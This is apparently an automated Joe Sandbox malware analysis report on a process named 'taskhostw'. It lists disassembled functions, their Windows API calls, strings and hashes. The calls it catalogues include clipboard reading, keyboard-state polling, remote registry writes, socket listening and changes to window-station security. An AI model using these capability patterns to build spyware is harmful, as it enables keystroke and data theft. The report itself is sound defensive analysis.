Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: bec113b21adf6d38d8c15e326d1e937021e311f580d38dd88221f4ded80a14c2
Instruction ID: 2c52a191ffe692eaa54373e913e9effb36bed11446a463163055854c7597c162
Opcode Fuzzy Hash: bec113b21adf6d38d8c15e326d1e937021e311f580d38dd88221f4ded80a14c2
Instruction Fuzzy Hash: 7F816F7191030EAFDF119FA4ED49AEF7B78EF04304F148169F954A61A2DB318E24DB60

Function 0022407C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0023F910), ref: 002240A6
IsClipboardFormatAvailable.USER32(0000000D), ref: 002240B4
GetClipboardData.USER32 ref: 002240BC
CloseClipboard.USER32 ref: 002240C8
GlobalLock.KERNEL32(00000000), ref: 002240E4
CloseClipboard.USER32 ref: 002240EE
GlobalUnlock.KERNEL32(00000000), ref: 00224103
IsClipboardFormatAvailable.USER32(00000001), ref: 00224110
GetClipboardData.USER32 ref: 00224118
GlobalLock.KERNEL32(00000000), ref: 00224125
GlobalUnlock.KERNEL32(00000000), ref: 00224159
CloseClipboard.USER32 ref: 00224269

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 15b3cf6a2dd7da401a237829a32d90c3d1b98a207804c95f6ea405cf38b05afb
Instruction ID: 451f16781e1a56a3764830ecbeadc599ee5b451e93d596062031c9f1b59c02c2
Opcode Fuzzy Hash: 15b3cf6a2dd7da401a237829a32d90c3d1b98a207804c95f6ea405cf38b05afb
Instruction Fuzzy Hash: 63518135214312ABD311BFA1FD8AF6F77A8AF94B00F004529FA56D21E1DF70D9158B62

Function 0021C7E8 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0021C819
FindClose.KERNEL32(00000000), ref: 0021C86D
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0021C892
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0021C8A9
FileTimeToSystemTime.KERNEL32(?,?), ref: 0021C8D0
__swprintf.LIBCMT ref: 0021C91C
__swprintf.LIBCMT ref: 0021C95F

Part of subcall function 001B7F41: _memmove.LIBCMT ref: 001B7F82

__swprintf.LIBCMT ref: 0021C9B3

Part of subcall function 001D3818: __woutput_l.LIBCMT ref: 001D3871

__swprintf.LIBCMT ref: 0021CA01

Part of subcall function 001D3818: __flsbuf.LIBCMT ref: 001D3893
Part of subcall function 001D3818: __flsbuf.LIBCMT ref: 001D38AB

__swprintf.LIBCMT ref: 0021CA50
__swprintf.LIBCMT ref: 0021CA9F
__swprintf.LIBCMT ref: 0021CAEE

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0021C916
%4d, xrefs: 0021C959
%02d, xrefs: 0021C9A7, 0021C9B1, 0021C9FF, 0021CA4E, 0021CA9D, 0021CAEC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 07b222a020768c1b3714f76b3ba24e15f3c9880a67d264068382fb249becee43
Instruction ID: a026c742caa1982a970a2acd76e39095b94e7196ba2b4a6313e7062e7635b02b
Opcode Fuzzy Hash: 07b222a020768c1b3714f76b3ba24e15f3c9880a67d264068382fb249becee43
Instruction Fuzzy Hash: 2AA13CB2418305ABC740EF64C986DEFB7ECAFA4704F404929F695D3191EB34DA49CB62

Function 002308E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002309DE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0023F910,00000000,?,00000000,?,?), ref: 00230A4C
RegCloseKey.ADVAPI32(00000000), ref: 00230A94
RegSetValueExW.ADVAPI32 ref: 00230B1D
RegCloseKey.ADVAPI32(?), ref: 00230E3D
RegCloseKey.ADVAPI32(00000000), ref: 00230E4A

Strings

REG_MULTI_SZ, xrefs: 00230C05
REG_BINARY, xrefs: 00230DD8
REG_QWORD, xrefs: 00230D8B
REG_SZ, xrefs: 00230B5B
REG_EXPAND_SZ, xrefs: 00230ABA
REG_DWORD, xrefs: 00230D0E

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 00abef8c3685840dc22b18a733b9aa3ed0da99eef066115f7a1bdc3a54d71c68
Instruction ID: 351a37edef9addc587ee71ac2aaeca31e1908b21ba1f3c7d1060d539e3448a67
Opcode Fuzzy Hash: 00abef8c3685840dc22b18a733b9aa3ed0da99eef066115f7a1bdc3a54d71c68
Instruction Fuzzy Hash: B002BE752106129FCB14EF24C895E6ABBE5FF88714F04885DF98A9B362CB30ED51CB91

Function 001C6841 Relevance: 23.4, Strings: 18, Instructions: 889COMMON

Download Yara Rule

Strings

UTF), xrefs: 00201450
LIMIT_RECURSION=, xrefs: 00201552
BSR_UNICODE), xrefs: 0020168E
0E%, xrefs: 001C689D
CRLF), xrefs: 00201617
CR), xrefs: 002015DD
UCP), xrefs: 00201463
UTF16), xrefs: 00201425
ANY), xrefs: 00201634
NO_START_OPT), xrefs: 002014A5
NO_AUTO_POSSESS), xrefs: 00201484
0F%, xrefs: 001C68A7
0D%, xrefs: 001C6893
ANYCRLF), xrefs: 00201651
LIMIT_MATCH=, xrefs: 002014C6
pG%, xrefs: 001C68B1
LF), xrefs: 002015FA
BSR_ANYCRLF), xrefs: 00201674

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: 0D%$0E%$0F%$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pG%
API String ID: 0-1014044530
Opcode ID: ca94349f9ae311144ff1d5115d2394cce1faf9ecdf91f23fbe166e64b2b83279
Instruction ID: 4e2a8072497de36c67c0cb0db304828044eea8df65eb83b774ff8f63f01fd4d8
Opcode Fuzzy Hash: ca94349f9ae311144ff1d5115d2394cce1faf9ecdf91f23fbe166e64b2b83279
Instruction Fuzzy Hash: B3726F75E103199BDB14CF99C880BADB7B5FF58310F14816AE849EB291EB70DE91CB90

Function 0021A279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0021A299
__swprintf.LIBCMT ref: 0021A2BB
CreateDirectoryW.KERNEL32(?,00000000), ref: 0021A2F8
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0021A31D
_memset.LIBCMT ref: 0021A33C
_wcsncpy.LIBCMT ref: 0021A378
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0021A3AD
CloseHandle.KERNEL32(00000000), ref: 0021A3B8
RemoveDirectoryW.KERNEL32(?), ref: 0021A3C1
CloseHandle.KERNEL32(00000000), ref: 0021A3CB

Strings

\??\%s, xrefs: 0021A2B5
\, xrefs: 0021A2D1
:, xrefs: 0021A2DC

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 38072e13fe1bc092dd3c52f33fd8e5519d8cc34ef0c481342f5811a9fa56f260
Instruction ID: 87b3c2edfba4570409485b332752bd1206a9f29ada95e91e6b0b30b191e6a71d
Opcode Fuzzy Hash: 38072e13fe1bc092dd3c52f33fd8e5519d8cc34ef0c481342f5811a9fa56f260
Instruction Fuzzy Hash: EB31E67191010AABDB20DFA0EC49FEF73BCEF99740F1041B6F918D2160EB7096948B25

Function 002081D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0020852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00208546
Part of subcall function 0020852A: GetLastError.KERNEL32(?,0020800A,?,?,?), ref: 00208550
Part of subcall function 0020852A: GetProcessHeap.KERNEL32(00000008,?,?,0020800A,?,?,?), ref: 0020855F
Part of subcall function 0020852A: HeapAlloc.KERNEL32(00000000,?,0020800A,?,?,?), ref: 00208566
Part of subcall function 0020852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0020857D

Part of subcall function 002085C7: GetProcessHeap.KERNEL32(00000008,00208020,00000000,00000000,?,00208020,?), ref: 002085D3
Part of subcall function 002085C7: HeapAlloc.KERNEL32(00000000,?,00208020,?), ref: 002085DA
Part of subcall function 002085C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00208020,?), ref: 002085EB

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00208238
_memset.LIBCMT ref: 0020824D
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0020826C
GetLengthSid.ADVAPI32(?), ref: 0020827D
GetAce.ADVAPI32(?,00000000,?), ref: 002082BA
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002082D6
GetLengthSid.ADVAPI32(?), ref: 002082F3
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00208302
HeapAlloc.KERNEL32(00000000), ref: 00208309
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0020832A
CopySid.ADVAPI32(00000000), ref: 00208331
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00208362
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00208388
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0020839C

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: d6ec69e5b1e4dfbe6d2a4432e4115e4a0958dbc29f7e807bd4ea919f584b0e30
Instruction ID: 481e36c30897c975da0eb6c73b317891973aa2f35a0103d79eaa925251a3b3af
Opcode Fuzzy Hash: d6ec69e5b1e4dfbe6d2a4432e4115e4a0958dbc29f7e807bd4ea919f584b0e30
Instruction Fuzzy Hash: DB61797191020AEFCF14CFA4EC48AEEBB79FF44700F048169F955A6292DB309A24CF60

Function 00230465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00230EA5: CharUpperBuffW.USER32(?,?), ref: 00230EBC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00230537

Part of subcall function 001B9997: __itow.LIBCMT ref: 001B99C2
Part of subcall function 001B9997: __swprintf.LIBCMT ref: 001B9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002305D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0023066E
RegCloseKey.ADVAPI32(000000FE), ref: 002308AD
RegCloseKey.ADVAPI32(00000000), ref: 002308BA

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 655b066993206d9c8c8ad755e1750c7975d6af8e04db7c86829de1472daebca7
Instruction ID: f341d195a85719956ce91eff0ac8fd42a56a9a98c23562f487a0096d6f2719ec
Opcode Fuzzy Hash: 655b066993206d9c8c8ad755e1750c7975d6af8e04db7c86829de1472daebca7
Instruction Fuzzy Hash: B2E18D70614201AFCB14DF29C995E6ABBE9FF88714F04846DF44ADB262DB30ED15CB51

Function 0021003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00210062
GetAsyncKeyState.USER32 ref: 002100E3
GetKeyState.USER32(000000A0), ref: 002100FE
GetAsyncKeyState.USER32 ref: 00210118
GetKeyState.USER32(000000A1), ref: 0021012D
GetAsyncKeyState.USER32 ref: 00210145
GetKeyState.USER32(00000011), ref: 00210157
GetAsyncKeyState.USER32 ref: 0021016F
GetKeyState.USER32(00000012), ref: 00210181
GetAsyncKeyState.USER32 ref: 00210199
GetKeyState.USER32(0000005B), ref: 002101AB

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 7e48d02c8a16f019ffab200bd7dfa81fa5e0afda132a79f52607c0d8c84182e5
Instruction ID: e9d0dfcc3c38d09fc2a2b7497354da99ffa5e0cc59b243e22ab8775be53d5736
Opcode Fuzzy Hash: 7e48d02c8a16f019ffab200bd7dfa81fa5e0afda132a79f52607c0d8c84182e5
Instruction Fuzzy Hash: FF41D9249147CB79FF309E6099843F5BEE0AF35340F48809AD5C9461C2E7E89DE4C7A2

Function 02A63540 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 02A638ED
0DJ, xrefs: 02A6386C
VUUU, xrefs: 02A63920
VUUU, xrefs: 02A96E3B
ERCP, xrefs: 02A6361F
0DJ, xrefs: 02A63792
VUUU, xrefs: 02A638DB

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID: 0DJ$0DJ$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-223423113
Opcode ID: 654ce61f7dd2a742b13c357ea2056ced6e37c8b4fba539751acb9a4fac51e2ed
Instruction ID: fafac94fff1f58ffb84777dd5369c27f3f0768804b817c8e555e4fbfb57d150a
Opcode Fuzzy Hash: 654ce61f7dd2a742b13c357ea2056ced6e37c8b4fba539751acb9a4fac51e2ed
Instruction Fuzzy Hash: F3A26DB0E0021ACBDF24CF59C9947BDB7B1BF44B14F1485EAE956A7280DB319A86CF50

Function 001C4140 Relevance: 15.1, APIs: 1, Strings: 7, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 001C44ED
VUUU, xrefs: 001F7A3B
VUUU, xrefs: 001C44DB
0D%, xrefs: 001C446C
ERCP, xrefs: 001C421F
0D%, xrefs: 001C4392
VUUU, xrefs: 001C4520

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID:
String ID: 0D%$0D%$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-3220804341
Opcode ID: a4f685f82a4161a2f8d4e267eeca27f3b14dd7ec16540c22f550061ce84bcead
Instruction ID: 6360f05b09740af949ebeac484009c2c9839d45277e87519f27393d80a1de0ff
Opcode Fuzzy Hash: a4f685f82a4161a2f8d4e267eeca27f3b14dd7ec16540c22f550061ce84bcead
Instruction Fuzzy Hash: 9DA27F74E0822ACBDF28CF58C960BBDB7B1BB64314F2581AED959A7284D770DD81CB50

Function 0022427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 002242A1
EmptyClipboard.USER32 ref: 002242A7
GlobalAlloc.KERNEL32(00000002,?), ref: 002242BC
CloseClipboard.USER32 ref: 0022435B

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 12d8102a1793ccf7fec209e3a51bb3ca362e0d7b3090337c5b2b77735acd4955
Instruction ID: adb7a18bfd4ed74da35683cf5cc16d9e603dc2f01cc1326438427c4ad78b7651
Opcode Fuzzy Hash: 12d8102a1793ccf7fec209e3a51bb3ca362e0d7b3090337c5b2b77735acd4955
Instruction Fuzzy Hash: 6F217A35610621AFEB10AFA1FD4EB6E77A8EF14710F10806AFD56DB2B1DB70A8118B54

Function 02A64CC0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02A64E05
_memmove.LIBCMT ref: 02A64E55
_memmove.LIBCMT ref: 02A64EBB

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
Instruction ID: f33f391b83206a46bbdfbfe53b55b11649c74458503af3cf808a15cf6346ecc3
Opcode Fuzzy Hash: 837f325ad964d4244a1dbd246846212314ca8241948a41978c0ca760d4cf362a
Instruction Fuzzy Hash: 4D125870A006199FDF14DFA9DA84AEEB7F6FF48304F108569E806E7290EF35A911CB54

Function 00226399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002263F2
WSAGetLastError.WSOCK32(00000000), ref: 00226401
bind.WSOCK32(00000000,?,00000010), ref: 0022641D
listen.WSOCK32(00000000,00000005), ref: 0022642C
WSAGetLastError.WSOCK32(00000000), ref: 00226446
closesocket.WSOCK32(00000000,00000000), ref: 0022645A

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 404201eb1939d33f735620c11724fca85ef00f1c008c508f94d10f55ce56eacd
Instruction ID: 6fbe2fd7b80ff366c9a8c6c9973a946d01bb9ff9056483c2ef5c3046d3741143
Opcode Fuzzy Hash: 404201eb1939d33f735620c11724fca85ef00f1c008c508f94d10f55ce56eacd
Instruction Fuzzy Hash: 5021E131600211AFCB10EFA4E949B6EB7A9EF44720F108168F956A73E2CB70AC11CB51

Function 02A5F240 Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON

Download Yara Rule

Strings

pbL, xrefs: 02A94112

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID:
String ID: pbL
API String ID: 0-2198975964
Opcode ID: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
Instruction ID: 847ebf4a5b9897f9ed90dd0389805578e7e6bf7100ec46fae175d23d62a4cba0
Opcode Fuzzy Hash: cb8729c52343b53710d90e753b25f9369214f47dccec846f2bc71a0ac487be56
Instruction Fuzzy Hash: D39256706083519FDB20DF24C580B2BB7F5BF89308F14896DE98A8B661DB75E845CF92

Function 02A64A80 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 02A70336: std::exception::exception.LIBCMT ref: 02A7036C
Part of subcall function 02A70336: __CxxThrowException@8.LIBCMT ref: 02A70381

_memmove.LIBCMT ref: 02A9F9AE
_memmove.LIBCMT ref: 02A9FAC3
_memmove.LIBCMT ref: 02A9FB6A

Memory Dump Source

Source File: 0000000A.00000003.453243892.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, Offset: 02A50000, based on PE: true

Associated: 0000000A.00000003.453243892.0000000002B03000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000003.453243892.0000000002B11000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_3_2a50000_taskhostw.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
Instruction ID: 2b14ceff32ee00687080d4d7f4b179d651b69f78d8cf85744b5a4ecbef1ae306
Opcode Fuzzy Hash: e83a155bf61ab41bcb8dfa51c36b184f9cdf33b0d0cfab516184054cc245601c
Instruction Fuzzy Hash: A2027EB1A00215DFDF14DF65DA80AAEBBF6EF48304F1580A9E806DB254EF31DA50CB95

Function 0022685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00227EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00227ECB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002268B4
WSAGetLastError.WSOCK32(00000000), ref: 002268DD
bind.WSOCK32(00000000,?,00000010), ref: 00226916
WSAGetLastError.WSOCK32(00000000), ref: 00226923
closesocket.WSOCK32(00000000,00000000), ref: 00226937

Memory Dump Source

Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true

